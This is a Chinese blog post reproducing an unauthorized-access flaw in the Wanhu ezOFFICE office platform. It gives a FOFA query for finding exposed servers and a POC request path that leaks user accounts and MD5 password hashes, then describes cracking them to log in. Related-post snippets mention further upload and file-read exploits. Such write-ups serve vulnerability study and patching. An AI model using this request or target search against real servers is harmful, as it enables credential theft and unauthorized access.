万户协同办公平台未授权访问漏洞复现

已于 2023-08-24 17:22:44 修改
阅读量734 收藏 1
点赞数
文章标签: 安全
于 2023-08-24 17:21:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43981050/article/details/132476738
版权

前言

此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!

一、产品简介

万户ezOFFICE协同管理平台涵盖门户自定义平台、信息知识平台管理、系统管理平台功能,它以工作流引擎为底层服务,以通讯沟通平台为交流手段,以门户自定义平台为信息推送显示平台,为用户提供集成的协同工作环境。

二、漏洞描述

该平台存在未授权访问漏洞,攻击者可以从evoInterfaceServlet接口获得系统登录账号和用MD5加密的密码

三、影响范围

version <=12.4.12.25

四、复现环境

FOFA:title=“万户ezOFFICE”

五、漏洞复现

1.POC

IP:port/defaultroot/evoInterfaceServlet?paramType=user

在这里插入图片描述

2.拿到MD5去解密
在这里插入图片描述
3.登录成功
在这里插入图片描述
在这里插入图片描述

六、修复建议

该漏洞仅影响较低版本,目前厂家已修复,可前往官网升级

http://www.whir.net/
明丨通
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
万户协同办公平台 ezoffice授权访问漏洞
xiaokp7的博客
09-13 799
万户ezOFFICE协同管理平台是一个综合信息基础应用平台万户ezoffice协同管理平台存在授权访问漏洞,攻击者可以从evoInterfaceServlet接口获得系统登录账号和用MD5加密的密码。
万户oa漏洞复现
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-25 2249
万户oa漏洞复现万户oa漏洞详情 /defaultroot/officeserverservlet 路径存在文件上传漏洞 万户oa漏洞复现 POST /defaultroot/officeserverservlet HTTP/1.1 Host: XXXXXXXXX:7001 Content-Length: 782 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://XXXXXXXX7001 User-Agent
漏洞复现万户ezEIP企业管理系统 /member/success.aspx 命令执行漏洞
siu~
06-11 731
万户ezEIP企业管理系统/member/success.aspx 接口处存在命令执行漏洞经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
复现万户ezoffice协同管理平台 任意文件读取漏洞_30
fushuang333的博客
01-27 588
复现万户ezoffice协同管理平台 任意文件读取漏洞,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容
Goby 漏洞更新 | 万户 OA OfficeServer.jsp 任意文件上传漏洞
m0_46699477的博客
04-27 1727
ezOFFICE OA是面向政府机关、企事业单位的FlexOffice独立安全协同办公平台。 ezOFFICE OA OfficeServer jsp存在任意文件上传漏洞,攻击者可通过该漏洞上传任意文件控制整个服务器。
万户协同办公平台ezoffice授权访问漏洞
薛定谔嘚喵博客
08-31 423
万户ezOFFICE协同管理平台是一个综合信息基础应用平台万户ezoffice协同管理平台存在授权访问漏洞,攻击者可以从evoInterfaceServlet接口获得系统登录账号和用MD5加密的密码。
zookeeper授权访问修复建议
07-14
ZooKeeper 授权访问修复建议 ZooKeeper 作为一个分布式应用程序协调服务,提供了高效、可靠的分布式锁、队列、节点管理等功能。但是,如果 ZooKeeper 没有正确地配置访问权限,就可能会出现授权访问的问题,...
BSPHP index.php 授权访问 信息泄露漏洞.md
04-08
BSPHP index.php 授权访问 信息泄露漏洞.md
SexyBeast233#SecBooks#BSPHP 存在授权访问 - 白阁文库1
07-25
本文由 简悦 SimpRead 转码, 原文地址 www.bylibrary.cn白阁文库是白泽 Sec 团队维护的一个漏洞 POC 和 EXP 披露以及漏洞
漏洞复现是什么如何复现.txt
01-31
漏洞复现
万户OA upload任意文件上传漏洞复现
0xSec
11-20 1290
万户ezOFFICE协同管理平台upload接口处存在任意文件上传漏洞经身份认证的攻击者可以通过此漏洞上传恶意后门文件,造成代码执行或服务器失陷。
漏洞复现--万户ezoffice FileCheckTemplateEdit SQL注入
qq_53003652的博客
11-23 582
万户ezOFFICE协同管理平台是一个综合信息基础应用平台。此系统SendFileCheckTemplateEdit.jsp存在SQL注入。万户ezoffice。
万户OA漏洞分析、利用与防护
不忘初心,护天下安全!
09-29 3364
万户OA 除了 /defaultroot/officeserverservlet 接口外的另一处接口 OfficeServer.jsp 同时也存在任意文件上传漏洞,导致攻击者可上传任意文件获取服务器权限。万户OA download_ftp.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。万户OA download_old.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件。2.使用防火墙等设备对所有相关poc进行检测、防护。可直接上传恶意jsp文件。
Java JMX 授权访问漏洞复现
最新发布
06-28
复现Java JMX授权访问漏洞的一般步骤如下: 1. **环境准备**: - 确保目标系统上启用了JMX,并且有一个可远程管理的应用程序暴露了MBean(Managed Bean)。 - 需要一个支持JMX的客户端工具,如Java自带的`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值